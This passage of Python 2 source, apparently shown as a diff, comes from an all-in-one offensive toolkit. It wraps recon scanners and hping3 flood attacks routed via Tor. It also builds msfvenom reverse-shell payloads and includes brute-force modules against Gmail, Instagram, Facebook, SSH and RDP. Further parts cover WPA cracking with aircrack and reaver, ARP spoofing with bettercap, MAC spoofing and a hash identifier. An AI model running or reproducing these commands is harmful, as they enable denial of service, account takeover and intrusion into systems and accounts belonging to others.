https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) - print "\n" - os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) - print "\n" - os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) - print "\n" - os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) - print "\n" - def daf(): - subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", - "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", - "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", - "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", - "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", - "web", "dev"] - - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(target) - showip = socket.gethostbyname(str(hosts)) - print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) - except: - print "\033[0mBypassing..." - - daf() - print "\033[0m" - print "\n" - os.system("nmap -A {0}".format(target)) - print "\n" - os.system("nmap --script dns-brute {0}".format(target)) - print "\n" - a = 'dirb {0}{1}/'.format(targetht,target) - os.system(a) - print "\n" - os.system("nikto -h {0} -p {1}".format(target,port)) - print "\n\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m" - except: - print "\033[91mError Something Went Wrong Maybe The Specified Target Is Not Available\033[0m" - -def specscan(): - print """\033[1m -Scans Available:\033[0m - -1: simple nmap portscan - -2: show document info of target with curl - -3: nmap OS detection, version detection, script scanning, and traceroute scan - -4: nmap dns bruteforce - -5: get a hosts ip address - -6: check if a host is online - -7: who-is lookup - -8: dns-lookup - -9: get a hosts source code - -10: web application firewall scanner - -11: run a ssl scan - -12: find the location of a ip address - -13: reverse ip lookup - -14: host search - -15: reverse dns - -16: find shared dns - -17: cloudflare bypass - -18: sslscan - -19: directory scan / bruteforce - -20: nikto scan [this might take awhile to finish] - -go back: go back to main menu - - """ - print "Type a number then your target Ex: 5 www.pornhub.com\n" - j = False - while not j: - try: - option, target = raw_input("\033[1mScan:\033[0m ").split() - if option == "1": - os.system("nmap {0}".format(target)) - if option == "2": - os.system("curl -I {0}".format(target)) - if option == "3": - os.system("nmap -A {0}".format(target)) - if option == "4": - os.system("nmap --script dns-brute {0}".format(target)) - if option == "5": - ip = socket.gethostbyname(target) - print """ - Host: {0} - IP: {1} - """.format(target, ip) - if option == "6": - ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") - if ht == "https": - targetht = "https://" - if ht == "http": - targetht = "http://" - request = requests.get(targetht + target) - http = request.status_code - if http == 200: - print("\nServer: [\033[32monline\033[0m]") - else: - print("\nServer: [\033[31moffline\033[0m]") - if option == "7": - whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") - print(whois) - if option == "8": - os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) - if option == "9": - os.system("curl {0}".format(target)) - if option == "10": - os.system("wafw00f {0}".format(target)) - if option == "11": - os.system("sslscan {0}".format(target)) - if option == "12": - os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) - if option == "13": - os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) - if option == "14": - os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) - if option == "15": - os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) - if option == "16": - os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) - if option == "17": - def daf(): - subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", - "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", - "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", - "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", - "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", - "web", "dev"] - - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(target) - showip = socket.gethostbyname(str(hosts)) - print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) - except: - print "\033[0mBypassing..." - - daf() - if option == "18": - a = 'sslscan {0}'.format(target) - os.system(a) - if option == "19": - ht = raw_input("HTTP or HTTPS: ") - if ht == "https": - targetht = "https://" - if ht == "http": - targetht = "http://" - a = 'dirb {0}{1}/'.format(targetht,target) - os.system(a) - if option == "20": - port = raw_input("\033[1mPort:\033[0m ") - os.system("nikto -h {0} -p {1}".format(target,port)) - if target == "back": - break - except: - print "\n" - break - j = True - - -def dos(): - print """ -{0}tcp: * tcp target port -{1}udp: * udp target port -{2}syn: * syn target port -{3}ack: * ack target port -{4}xmas: * xmas target port -\033[0m -!Press CTRL C to stop attacking! - """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) - try: - command, target, port = raw_input("\033[1mMethod:\033[0m ").split() - if command == "tcp": - os.system("service tor restart") - os.system("hping3 --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) - if command == "udp": - try: - ip = socket.gethostbyname(target) - port = int(port) - os.system("service tor restart") - sent = 0 - while True: - print N+"UDP attack sending | {6}{5}\033[0m | {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year,ip,random.choice(colorlist)) - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - if port == 65534: - port = 1 - except: - print "\nUDP flood stopped\n" - os.system("") - if command == "syn": - os.system("service tor restart") - os.system("hping3 -S --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) - if command == "ack": - os.system("service tor restart") - os.system("hping3 -A --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) - if command == "xmas": - os.system("hping3 -X --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) - except: - print "\n\033[91mError: Not Enough Arguments\033[0m\n " - - -def payload(): - print """\033[0m033[1m -Payloads Available:\033[0m - -{0}1: windows/meterpreter/reverse_tcp - -{1}2: android/meterpreter/reverse_tcp - -{2}3: php/meterpreter/reverse_tcp - -{3}4: python/meterpreter/reverse_tcp - -{4}5: ruby/shell_reverse_tcp - -{5}6: osx/x86/vforkshell/reverse_tcp - -{6}7: linux/aarch64/meterpreter/reverse_tcp - - \033[0m""".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) - choice = raw_input("\033[1mPayload:\033[0m ") - lhost = raw_input("\033[1mLHOST: \033[0m") - lport = raw_input("\033[1mLPORT: \033[0m") - name = raw_input("\033[1mFilename: \033[0m") - if choice == "1": - payload = 'msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.exe'.format(lhost, lport, name) - os.system(payload) - if choice == "2": - payload = 'msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.apk'.format(lhost, lport, name) - os.system(payload) - if choice == "3": - payload = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost, lport, name) - os.system(payload) - if choice == "4": - payload = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost, lport, name) - os.system(payload) - if choice == "5": - payload = 'msfvenom -p ruby/shell_reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.rb'.format(lhost, lport, name) - os.system(payload) - if choice == "6": - payload = 'msfvenom -p osx/x86/vforkshell/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.app'.format(lhost, lport, name) - os.system(payload) - if choice == "7": - payload = 'msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.tar'.format(lhost, lport, name) - os.system(payload) - -def gmail(): - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() - -def insta(): - insta = raw_input("\033[1mUsername:\033[0m ") - jl = raw_input("\033[1mWordlist:\033[0m ") - print "\033[1m\033[94m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" - k = raw_input("\033[1mMode:\033[0m ") - ma = 'python3 files/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) - os.system(ma) - -def fb(): - facebook = raw_input("\033[1m[EMAIL/ID->]:\033[0m ") - word = raw_input("\033[1m[WORDLIST->]:\033[0m ") - ks = 'cd files && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def blackhydra(): - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() - -def medusa(): - k = raw_input("\033[1mHost:\033[0m ") - u = raw_input("\033[1mUser:\033[0m ") - p = raw_input("\033[1mWordlist:\033[0m ") - os.system("medusa -d") - print "\n" - m = raw_input("\033[1mModule:\033[0m ") - n = raw_input("\033[1mPort:\033[0m ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) - -def aircrack(): - b = raw_input(G+"\033[1mBSSID: \033[0m") - e = raw_input(G+"\033[1mESSID: \033[0m") - w = raw_input(G+"\033[1mWordlist: \033[0m") - h = raw_input(G+"\033[1mHandshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"\033[1mInterface: \033[0m") - os.system("airmon-ng start " + i) - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) - os.system("airmon-ng stop " + i) - -def reaver(): - os.system("iwconfig") - j = raw_input("\033[1mSelect Interface:\033[0m ") - k = raw_input("\033[1mEnter BSSID:\033[0m ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) - -def password(): - print """ -{0}1: gmail -{1}2: instagram -{2}3: facebook -{3}4: hydra -{4}5: medusa -{5}6: aircrack-ng -{6}7: reaver -\033[0m -go back: go to main menu - """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) - try: - choice = raw_input("\033[1mAttack:\033[0m ") - if choice == "1": - gmail() - if choice == "2": - insta() - if choice == "3": - fb() - if choice == "4": - blackhydra() - if choice == "5": - medusa() - if choice == "6": - aircrack() - if choice == "7": - reaver() - if choice == "go back": - os.system("") - - except: - print "\n" - -def reboot(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - -def monitoron(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def monitoroff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) - -def command(): - command = raw_input("\033[1mCommand:\033[0m ") - os.system(command) - -def anonon(): - print "\033[93m------------------------\033[0m" - print "\nSTARTING MACCHANGER\n" - print "\033[93m------------------------\033[0m" - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) - show = 'macchanger -s {0}'.format(k) - os.system(show) - os.system('proxychains python htkl.py --quickrun') - - -def anonoff(): - print "\033[93m------------------------\033[0m" - print "\nSTOPPING MACCHANGER\n" - print "\033[93m------------------------\033[0m" - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) - sys.exit() - reboot() - -def sysinfo(): - os.system("iwconfig") - k = raw_input("\033[1mInterface:\033[0m ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) - os.system("uname -a") - os.system("whoami") - -def netscan(): - print """ -{0}1: scan for devices in your network - -{1}2: scan for networks around you -\033[0m -go back: go back to main menu - """.format(random.choice(colorlist), random.choice(colorlist)) - try: - choice = raw_input("\033[1mScan:\033[0m ") - - if choice == "1": - os.system("netdiscover") - if choice == "2": - os.system("iwconfig") - m = raw_input("\033[1mSelect Interface:\033[0m ") - os.system("airmon-ng start " + m) - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("\033[1m[y/n]>\033[0m ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) - os.system("airmon-ng stop " + i) - if choice == "go back": - os.system("") - except: - print "\n" - -def verscan(): - print """ -Services available: - -{0}ssh - -{1}mysql -\033[0m - """.format(random.choice(colorlist), random.choice(colorlist)) - try: - service = raw_input("\033[1mService: \033[0m") - if service == "ssh": - f = raw_input(G+"\033[1mTarget: \033[0m") - g = raw_input(G+"\033[1mPort: \033[0m") - t = raw_input(G+"\033[1mThreads: \033[0m") - b = raw_input(G+"\033[1mTimeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system('echo "exit\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r sshver.rc') - os.system('rm -rf sshver.rc') - - if service == "mysql": - f = raw_input(G+"\033[1mTarget: \033[0m") - g = raw_input(G+"\033[1mPort: \033[0m") - t = raw_input(G+"\033[1mThreads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system('echo "exit\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') - except: - print "\n" - -def wordlist(): - os.system("cd wordlists && cupp -i") - print Y+"wordlist saved to /root/htk-lite/wordlists \033[0m" - -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("\033[1mTarget/s:\033[0m ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") - -def traff(): - os.system("iwconfig") - s = raw_input("\033[1mSelect Interface:\033[0m ") - os.system("tcpdump -i " + s) - -def hashid(): - try: - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 